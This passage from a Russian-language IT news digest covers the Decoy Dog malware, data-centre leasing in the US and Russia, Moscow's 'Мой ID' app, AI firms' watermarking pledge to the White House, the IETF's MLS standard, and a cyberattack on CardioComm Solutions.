Decoy Dog основан на трояне удалённого доступа Pupy RAT. Однако значительные изменения кода указывают на участие в разработке опытных специалистов. По мнению Infoblox, тот факт, что новый вредонос основан на коде Pupy — лишь дымовая завеса для сокрытия реальных возможностей Decoy Dog. Эксперты уверены, что использование данного вредоноса будет лишь продолжать расти и влиять на организации по всему миру.
Infoblox подчёркивает критическую необходимость повышения безопасности DNS, например, с помощью использования систем обнаружения и реагирования на DNS- угрозы. Как сообщают исследователи, некоторые из 20 доменов Decoy Dog, находящихся под мониторингом, были зарегистрированы и развёрнуты буквально в течение последнего месяца.
«Интуитивно понятно, что DNS должна быть первой линией обороны для организаций, чтобы обнаруживать и смягчать такие угрозы, как Decoy Dog», — сказал Скотт Харрелл, президент и гендиректор Infoblox. «Как показывает пример Decoy Dog, изучение и глубокое понимание тактики и методов злоумышленников позволяет нам блокировать угрозы ещё до того, как о них становится известно как о вредоносном ПО».
«Мы призываем отрасль продвигать эти исследования, изучать проблему и делиться результатами», — заключил Харрелл.
Международный инвестиционный банк и финансовый сервис TD Cowen прогнозирует рекордный год для аренды центров обработки данных (ЦОД) в США. Основным фактором стал спрос на искусственный интеллект. За последние 3 месяца было подписано арендных соглашений на общую мощность около 2.1 ГВт.
Среди крупных сделок стоит отметить: Google арендовал 600 МВт в Техасе, Microsoft - 420 МВт в Лисберге, 360 МВт в Далласе и 300 МВт в Чикаго. Совокупная мощность арендованных в США ЦОДов сейчас составляет около 10 ГВт. Однако, существуют и запросы на аренду более 500 МВт от крупных компаний и правительства США.
Отмечается, что арендная мощность увеличилась с 500 МВт до более чем 1 ГВт за последние 90 дней. Цены на аренду повышаются в связи с ограниченным предложением и высоким спросом, а также из-за увеличения стоимости строительства данных центров. Однако, несмотря на вложения, сроки поставки оборудования продолжают увеличиваться. Например, срок поставки 3 МВт генераторов Caterpillar составляет около 2,5 лет.
Большие российские компании стали переводить обработку важной информации из Москвы в центры обработки данных (ЦОД) за Уралом. В «Ростелекоме» подтверждают спрос на размещение ЦОД за Уралом. В сегменте облачных сервисов в Екатеринбурге и Новосибирске компания отмечает рост спроса на 20–30% по сравнению с прошлым годом.
По данным Минэнерго США, дата-центры потребляют около 2% всего электричества в США, и из них примерно 40% уходит на поддержание оптимальной температуры вычислительного оборудования. Поэтому компания Intel представила новый дизайн радиаторов для охлаждения чипов , вдохновленный коралловыми рифами.
Московский Департамент информационных технологий объявил о выпуске нового мобильного приложения «Мой ID». ГКУ «Инфогород» разработал его для хранения цифровых копий документов, которые также можно будет предъявлять в виде QR- кодов.
По словам разработчиков, благодаря приложению, пользователям не придется хранить отдельные сканы или фотографии бумаг на своем смартфоне. Вместо этого, граждане смогут заполнять онлайн-формы, используя данные, загруженные в «Мой ID».
Сохранить можно данные российского и заграничного паспортов, СНИЛС, ИНН, полис ОМС, водительское удостоверение, информацию о домашнем животном, а еще такие идентификаторы, как карта москвича и единый читательский билет. Это должно упростить ряд повседневных задач, включая, например, покупку билетов или заказ пропусков.
Как подчеркнула пресс-служба Департамента, приложение не сможет заменить оригинальные документы. Однако, с прогрессом в области законодательства, есть возможность, что в будущем цифровые копии будут иметь такую же силу, как их бумажные эквиваленты.
«Мой ID» связано с личным кабинетом пользователя и сервисами портала Mos.ru. Вся используемая информация хранится в городском центре обработки данных ДИТ Москвы, обеспечивающем защиту в соответствии с требованиями регулятора по информационной безопасности. Разработчики также предусмотрели возможность установки пин-кода.
Приложение уже доступно для загрузки в App Store, Google Play, RuStore и RuMarket.
В феврале 2023 министр цифрового развития Максут Шадаев заявил о возможности замены бумажного паспорта на электронный в 80% случаев. Ответственность за разработку условий использования цифровых удостоверений личности была возложена на правительство, ФСБ и МВД. В апреле того же года Минцифры представило проект указа, допускающий использование приложения «Госуслуги» для предъявления документов, но конкретные случаи, в которых это будет уместно, пока не определены. Сейчас проект находится на стадии рассмотрения, его подписание ожидается к концу лета.
Ведущие мировые компании, специализирующиеся на искусственном интеллекте, включая таких гигантов как OpenAI, Alphabet и Meta Platforms, пообещали Белому дому добровольно внедрить водяные знаки для контента, созданного ИИ, с целью повышения безопасности использования технологии.
К обязательству присоединились и другие ключевые игроки в области ИИ, в том числе Anthropic, Inflection, Amazon.com и Microsoft, являющийся партнером OpenAI. Все они подтвердили свою готовность проводить тщательное тестирование систем перед релизом, а также делиться информацией о методах снижения рисков и необходимости инвестиций в кибербезопасность.
"Мы ценим усилия президента по вовлечению технологической индустрии в разработку конкретных шагов для обеспечения большей безопасности, защищенности и социальной значимости ИИ", - отмечено в публикации Microsoft, размещенной в блоге компании в пятницу.
Генеративный AI, применяемый для создания нового контента на основе собранных данных и мимикрирующий под тексты, созданные человеком, стал настоящим сенсацией. Поэтому законодатели всего мира встали перед необходимостью выработать меры по предотвращению возможных рисков, которые может представлять эта новая технология для национальной безопасности и экономики стран.
В вопросах регулирования искусственного интеллекта США отстают от Евросоюза. В июне текущего года законодатели ЕС согласовали проект набора правил, согласно которым системы, подобные ChatGPT, должны раскрывать информацию о контенте, созданном AI, помогать различать так называемые deep-fake изображения от настоящих и обеспечивать защиту от незаконного контента.
Лидер большинства в Сенате США от Демократической партии Чак Шумер в июне призвал к разработке "всеобъемлющего законодательства", чтобы обеспечить прогресс и гарантировать безопасность использования искусственного интеллекта.
Конгресс рассматривает законопроект, который потребует от создателей политической рекламы раскрыть информацию о том, использовался ли ИИ для создания изображений или другого контента.
Президент Джо Байден, встретившийся в Белом доме с руководителями семи ключевых компаний в области AI в пятницу, также работает над разработкой указа и двухпартийного законодательства о технологии ИИ.
В рамках этой работы, семь ведущих компаний в области ИИ обязались разработать систему "водяных знаков" ко всем формам контента, от текста и изображений до аудио и видео, созданных с помощью AI. Это позволит пользователям узнавать, когда была использована данная технология.
Ожидается, что водяной знак, встроенный в контент на техническом уровне, облегчит пользователям распознавание deep-fake изображений или аудиозаписей, которые могут, например, иллюстрировать несуществующее насилие, усиливать эффект обмана или искажать изображение политика, представляя его в невыгодном свете.
Остается неясным, каким образом водяной знак будет проявляться при обмене информацией.
Компании также обязались сосредоточить свои усилия на защите конфиденциальности пользователей в процессе развития ИИ и гарантировать, что технология будет свободна от предубеждений и не будет использоваться для дискриминации уязвимых групп.
Среди других обязательств, которые взяли на себя компании, - разработка ИИ- решений для решения научных задач, включая медицинские исследования, и мер по смягчению последствий климатических изменений.
Большие российские компании стали переводить обработку важной информации из Москвы в центры обработки данных (ЦОД) за Уралом, рассказали “Ъ” два собеседника среди хостинг-провайдеров.
В «Ростелекоме» подтверждают спрос на размещение ЦОД за Уралом. В сегменте облачных сервисов в Екатеринбурге и Новосибирске компания отмечает рост спроса на 20–30% по сравнению с прошлым годом: «ЦОД в этих городах в ближайшее время будут пополняться мощностями, планируется за ближайшие пять лет удвоить число стойко-мест».
По данным хостинг-провайдера RUVDS, за последний год количество клиентов в ЦОД Екатеринбурга, Владивостока и Новосибирска выросло более чем на 80% по сравнению с около 17% в европейской части страны. Спрос на дата-центры за Уралом почти в пять раз больше, чем на площадки в европейской части России, уточняет основатель и гендиректор RUVDS. В МТС, которая также строит ЦОД за Уралом (в 2022 году компания заявила о завершении строительства первого модульного ЦОД в Новосибирске), не ответили на запрос “Ъ”.
Среди крупных игроков, которые недавно перенесли часть хранения и обработки данных из Московского региона за Урал источники “Ъ” называют «Вертолеты России» (входят в «Ростех») и АЛРОСА.
Источник “Ъ” на рынке утверждает, что одним из факторов дублирования и резервирования критических данных и информационных систем на Урале и в Сибири стала угроза терроризма. «Атаки беспилотников на Москву и Подмосковье, а также нестабильная политическая ситуация — серьезный риск для компаний, использующих ЦОД в этом регионе»,— поясняет он. Если дата-центр или системы питания, подходящие к нему, будут повреждены, отключится интернет и не будет резервного хранения информации, работа клиентов ЦОД будет остановлена. «Поэтому спрос на дублирование данных в более безопасных регионах будет расти», - отмечает источник.
Представитель 3data подтверждает, что заказчиков интересует размещение решений на удаленных друг от друга площадках, чтобы «в случае физических атак не пострадал второй объект резервирования».
Географически распределенное решение имеет свои преимущества, в том числе от физического воздействия и чрезвычайной ситуации на объекте или вблизи него, добавляет представитель 3data. Однако, по оценке экспертов, сейчас за Уралом практически нет свободных мощностей в коммерческих ЦОД. С учетом растущего спроса потребуется строить новые дата-центры. Несколько ЦОД планируют открыть в 2023 году в Екатеринбурге, Новосибирске, Владивостоке, Тюмени и на Сахалине «Ростелеком-ЦОД», KeyPoint и другие.
Организация Internet Engineering Task Force (IETF), ответственная за развитие протоколов и архитектуры интернета, создала новые правила для протокола MLS (Messaging Layer Security). Этот протокол помогает защищать сообщения в интернете. Спецификация RFC 9420 сейчас имеет статус «Предложенного стандарта». Это означает, что её еще проверяют и могут изменить.
Протокол MLS предназначен для организации сквозного шифрования (End-to-End Encryption, E2EE) в мессенджерах. Предполагается, что внедрение MLS позволит унифицировать механизмы сквозного шифрования сообщений в группах, охватывающих двух и более участников, и упростить внедрение их поддержки в приложения.
О работе по внедрению поддержки MLS в свои продукты объявили компании AWS, Cisco, Cloudflare, Google, Meta, Mozilla, Phoenix R&D и Wire, а также организация Matrix Foundation, развивающая платформу децентрализованных коммуникаций Matrix.
Основной целью создания нового протокола называется унификация средств для сквозного шифрования и внедрение единого стандартизированного и верифицированного протокола вместо отдельных протоколов разных производителей, не совместимых между собой.
MLS позволит использовать готовые реализации протокола, которые можно будет совместно развивать и проверять. Совместимость на уровне приложений будет достигаться на уровне аутентификации, получения ключей и обеспечения конфиденциальности.
MLS разрабатывается на C++ ( MLSpp , RingCentral ), Go , TypeScript и Rust ( OpenMLS , Wickr ), причем для его разработки использованы наработки уже существующих протоколов, таких как S/MIME , OpenPGP , Off the Record и Double Ratchet . Поддержка MLS уже реализована на платформах коммуникаций Webex и RingCentral, и ожидается её внедрение в проектах Wickr и Matrix.
Основные задачи протокола включают:
-Конфиденциальность: только члены группы могут читать сообщения;
-Гарантии целостности и аутентификации: каждое сообщение отправляется от проверенного отправителя и не может быть изменено в процессе передачи;
-Аутентификация участников группы: каждый участник может проверить подлинность остальных участников группы;
-Работа в асинхронном режиме: ключи шифрования могут быть предоставлены без необходимости одновременного онлайн-присутствия всех участников;
-Прямая секретность (Forward Secrecy): компрометация одного из участников не позволяет расшифровать ранее отправленные сообщения в группе;
-Защита после компрометации: компрометация одного из участников не позволяет расшифровать будущие сообщения в группе;
-Масштабируемость: потенциальная сублинейная масштабируемость в плане потребления ресурсов в зависимости от размера группы.
Канадский поставщик технологий для мониторинга сердца CardioComm Solutions
столкнулся с кибератакой, которая приостановила работу компании. 25 июля
CardioComm Solutions заявила, что ее коммерческая деятельность может быть
приостановлена на несколько дней из-за киберинцидента на серверах компании.
Сейчас сайт CardioComm отображает текстовое сообщение, в котором говорится,
что компания испытывает технические неполадки.
Инцидент повлиял на несколько продуктов и услуг CardioComm, включая:
HeartCheck CardiBeat: это портативный монитор электрокардиограммы (ЭКГ), который подключается к смартфону пользователя через Bluetooth и позволяет передавать результаты врачу, клинике или сервису CardioComm для чтения ЭКГ;
Global Cardio 3 : программное обеспечение для диагностики записей ЭКГ пациентов и создания отчетов по ЭКГ;
Home Flex : программное обеспечение, которое позволяет пользователям загружать и делиться данными о работе их сердца.
Полные последствия сбоя и его влияние на пользователей, полагающихся на эти устройства для мониторинга своего здоровья, пока неизвестны. В CardioComm не прокомментировали ситуацию.
CardioComm не раскрыла подробности о характере инцидента, но упомянула, что активно работает над восстановлением данных и наладкой рабочих серверных сред. Это может указывать на атаку программы-вымогателя.
Компания подчеркнула, что пока нет доказательств компрометации данных о здоровье клиентов. Однако были приняты шаги для предотвращения возможной кражи личных данных, если расследование покажет, что личная информация сотрудников была скомпрометирована.
Кибератака не оказала значительного влияния на акции компании. Цена акции компании CardioComm Solutions (EKG) на бирже CVE составляет 0,01 канадского доллара и не изменилась с 5 мая 2023 года. Компания имеет рыночную капитализацию в размере 1,51 миллиона канадских долларов и коэффициент цена/прибыль в 20,00